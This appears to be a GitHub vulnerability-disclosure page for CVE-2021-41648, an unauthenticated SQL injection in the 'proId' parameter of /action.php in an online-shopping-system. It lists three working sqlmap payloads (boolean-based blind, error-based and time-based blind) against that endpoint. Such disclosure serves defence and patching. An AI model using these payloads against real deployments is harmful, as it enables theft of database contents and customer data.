Skip to content

MobiusBinary/CVE-2021-41648

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

CVE-2021-41648

CVE-2021-41648 SQL Injection in online-shopping-system

The online-shopping-system is vulnerable to un-authenticated error/boolean-based blind & error based SQL Injection attacks.

The proId parameter on the /action.php page does not sanitize the user input, an attacker can extract sensisitive data from the underlying MySQL Database.

Link To Application

online-shopping-system

Affected Components & Parameter

URL: /action.php
PARAMETER: proId

Poc's

SQLMAP PAYLOADS

proId parameter on the /action.php page

Parameter: proId (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) Payload: proId=61 OR 17-7=10' OR NOT 4774=4774#&addToCart=1

Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: proId=61 OR 17-7=10' OR (SELECT 6869 FROM(SELECT COUNT(*),CONCAT(0x717a716271,(SELECT (ELT(6869=6869,1))),0x716a627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- gfTu&addToCart=1

Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: proId=61 OR 17-7=10' AND (SELECT 2990 FROM (SELECT(SLEEP(5)))YhWy)-- xWNo&addToCart=1

If the POC Image is unclear, please click on the GIF which will load in a better resolution.

 POC - proId

Discovered by

Jason Colyvas
MOBIUSBINARY
September 21st, 2021

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published